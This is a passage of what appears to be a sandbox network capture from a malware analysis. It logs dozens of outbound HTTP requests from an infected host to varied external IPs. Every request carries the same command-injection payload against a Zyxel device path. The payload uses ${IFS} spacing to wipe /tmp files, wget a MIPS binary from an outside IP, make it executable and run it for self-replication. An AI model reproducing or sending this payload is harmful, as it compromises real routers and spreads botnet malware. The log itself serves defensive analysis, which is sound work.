                                      Jan 19, 2024 17:29:32.775198936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4483192.168.2.1442604186.136.25.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775243998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4484192.168.2.143863640.176.214.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775265932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4485192.168.2.1434688207.193.74.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775304079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4486192.168.2.145406019.221.233.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775348902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4487192.168.2.144924641.148.65.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775368929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4488192.168.2.1440474103.72.63.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775419950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4489192.168.2.145746889.48.246.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775477886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4490192.168.2.1434892204.68.97.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775505066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4491192.168.2.1451074134.95.194.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775547028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4492192.168.2.1438902103.37.252.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775574923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4493192.168.2.145786870.167.205.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775603056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4494192.168.2.145755464.92.21.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775654078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4495192.168.2.146078086.165.170.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775672913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4496192.168.2.1440648161.87.107.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775712013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4497192.168.2.1434434107.194.244.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775753021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4498192.168.2.14486241.15.145.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775777102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4499192.168.2.1453342193.230.103.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775830984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4500192.168.2.1434090195.61.41.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775872946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4501192.168.2.145139849.122.249.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775917053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4502192.168.2.1433428147.26.49.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775958061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4503192.168.2.1441956161.221.45.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775994062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4504192.168.2.1445540217.77.180.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776022911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4505192.168.2.1442730170.239.145.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776072025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4506192.168.2.144543241.35.249.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776117086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4507192.168.2.143969868.241.94.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776153088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4508192.168.2.1435024119.254.207.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776197910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4509192.168.2.143589492.250.53.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776259899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4510192.168.2.145257045.10.142.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776285887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4511192.168.2.1449042152.198.246.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776313066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4512192.168.2.1459412151.143.15.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776345968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4513192.168.2.144657619.185.43.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776367903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4514192.168.2.145775281.66.1.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776395082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4515192.168.2.14366385.207.18.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776447058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4516192.168.2.1457698194.9.172.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776493073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4517192.168.2.1443784164.229.88.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776524067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4518192.168.2.143732482.5.167.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776551008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4519192.168.2.144213238.248.232.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776607037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4520192.168.2.144682014.28.213.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776643991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4521192.168.2.143736876.6.0.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776678085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4522192.168.2.1458322187.152.140.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776712894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4523192.168.2.145812019.221.126.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776746988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4524192.168.2.1450014150.146.170.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776786089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4525192.168.2.1433724223.32.17.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776837111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4526192.168.2.1436168190.253.165.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776875973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4527192.168.2.143699285.70.12.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776916027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4528192.168.2.145413281.77.22.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776946068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4529192.168.2.144770063.132.29.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.776989937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4530192.168.2.1453090198.114.239.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777055025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4531192.168.2.145329845.220.214.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777086020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4532192.168.2.1442636182.130.235.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777122974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4533192.168.2.1433008207.211.119.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777147055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4534192.168.2.145523623.34.147.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777209044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4535192.168.2.143855650.68.212.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777246952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4536192.168.2.1446490167.130.209.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777282953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4537192.168.2.1433554115.191.149.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777307034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4538192.168.2.145523649.222.185.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777357101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4539192.168.2.144409218.27.165.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777380943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4540192.168.2.1447058177.101.206.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777410030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4541192.168.2.14363808.47.48.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777476072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4542192.168.2.145062445.255.29.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777492046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4543192.168.2.14607984.23.195.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777523041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4544192.168.2.143526461.72.144.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777554989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4545192.168.2.1450404138.219.95.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777611017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4546192.168.2.1451010116.27.135.29443
                                      TimestampBytes transferredDirectionData
